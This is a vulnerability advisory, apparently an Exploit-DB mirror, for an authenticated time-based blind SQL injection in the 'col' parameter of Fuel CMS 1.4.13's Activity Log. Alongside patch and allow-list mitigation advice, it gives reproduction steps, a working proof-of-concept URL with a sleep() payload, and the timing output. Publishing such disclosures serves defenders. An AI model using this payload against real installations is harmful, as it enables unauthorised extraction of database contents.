Vendor: Fuel CMS
By: Rahad Chowdhury
CVSS: 8.8 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: Fuel CMS
Affected Version From: 1.4.13
Affected Version To: 1.4.13
Patch Exists: YES
Related CWE:
CPE: a:getfuelcms:fuel_cms:1.4.13
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux, PHP 7.4.16, Apache 2.4.46
2021

Fuel CMS 1.4.13 – ‘col’ Blind SQL Injection (Authenticated)

Fuel CMS 1.4.13 is vulnerable to time-based blind SQL injection in the 'col' parameter of the Activity Log listing (/fuel/logs/items). An attacker who is logged into the Fuel CMS panel can append SQL to the 'col' value and, by measuring how long the server takes to respond, infer the result of arbitrary queries and extract database contents one bit at a time. To reproduce: log into the panel, open the 'Activity Log' menu, select any type option, and inject a delay-based payload into the 'col' parameter of the resulting request.

Mitigation:

The vendor has released a patch to address this vulnerability; update to the latest Fuel CMS release. As a general defence, a sort-column parameter such as 'col' cannot be passed as a prepared-statement bind variable, so the application should compare it against an allow-list of permitted column names and reject any other value before it is placed in the query. Because the issue requires an authenticated session, restricting access to the panel also reduces exposure until the update is applied.

Exploit-DB raw data:

# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
# Date: 2021-04-11
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
# Version: 1.4.13
# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46

Steps to Reproduce:
1. First, log in to your panel.
2. Then go to the "Activity Log" menu.
3. Then select any type option.
4. The "col" parameter there is vulnerable. Let's try to inject a Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in the "col=" parameter.

POC:
http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date and (select * from(select(sleep(1)))a)&fuel_inline=0

Output:
By issuing sleep(0), the response will be delayed by 0 seconds.
By issuing sleep(1), the response will be delayed by 1 second.
By issuing sleep(5), the response will be delayed by 5 seconds.
By issuing sleep(10), the response will be delayed by 10 seconds.